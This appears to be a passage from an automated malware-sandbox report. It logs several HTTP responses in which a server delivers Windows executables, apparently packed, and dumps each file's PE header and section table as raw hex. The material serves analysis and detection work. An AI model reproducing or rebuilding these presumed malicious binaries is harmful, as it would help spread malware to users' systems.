61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 7a 78 6b 76 69 6d 72 00 f0 1a 00 00 90 51 00 00 e4 1a 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 75 6f 6b 79 74 75 00 10 00 00 00 80 6c 00 00 04 00 00 00 20 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 6c 00 00 22 00 00 00 24 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:01:47 GMTContent-Type: application/octet-streamContent-Length: 2742272Last-Modified: Thu, 24 Oct 2024 01:44:44 GMTConnection: keep-aliveETag: "6719a68c-29d800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 25 5a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 78 69 6a 65 73 76 6f 00 80 29 00 00 a0 00 00 00 78 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6f 61 6d 79 79 68 71 00 20 00 00 00 20 2a 00 00 04 00 00 00 b2 29 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2a 00 00 22 00 00 00 b6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:01:59 GMTContent-Type: application/octet-streamContent-Length: 3015168Last-Modified: Thu, 24 Oct 2024 01:49:10 GMTConnection: keep-aliveETag: "6719a796-2e0200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 80 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 31 00 00 04 00 00 99 a1 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 7a 6b 6a 6a 72 79 63 00 70 2b 00 00 00 06 00 00 6a 2b 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6c 71 70 7a 75 65 75 00 10 00 00 00 70 31 00 00 06 00 00 00 da 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 31 00 00 22 00 00 00 e0 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:02:10 GMTContent-Type: application/octet-streamContent-Length: 1918464Last-Modified: Thu, 24 Oct 2024 01:49:16 GMTConnection: keep-aliveETag: "6719a79c-1d4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 90 6c 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 6c 00 00 04 00 00 72 5c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 
61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 7a 78 6b 76 69 6d 72 00 f0 1a 00 00 90 51 00 00 e4 1a 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 75 6f 6b 79 74 75 00 10 00 00 00 80 6c 00 00 04 00 00 00 20 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 6c 00 00 22 00 00 00 24 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:02:19 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Thu, 24 Oct 2024 01:44:18 GMTConnection: keep-aliveETag: "6719a672-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a a6 19 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 88 3d 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:02:24 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 
00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:02:42 GMTContent-Type: application/octet-streamContent-Length: 1895936Last-Modified: Thu, 24 Oct 2024 01:49:23 GMTConnection: keep-aliveETag: "6719a7a3-1cee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 f0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4b 00 00 04 00 00 86 d7 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 d2 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 d1 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 
90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 72 6f 70 67 66 73 73 00 e0 19 00 00 00 31 00 00 d4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6d 75 74 77 74 7a 68 00 10 00 00 00 e0 4a 00 00 04 00 00 00 c8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4a 00 00 22 00 00 00 cc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:02:47 GMTContent-Type: application/octet-streamContent-Length: 1918464Last-Modified: Thu, 24 Oct 2024 01:49:16 GMTConnection: keep-aliveETag: "6719a79c-1d4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 90 6c 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 6c 00 00 04 00 00 72 5c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 
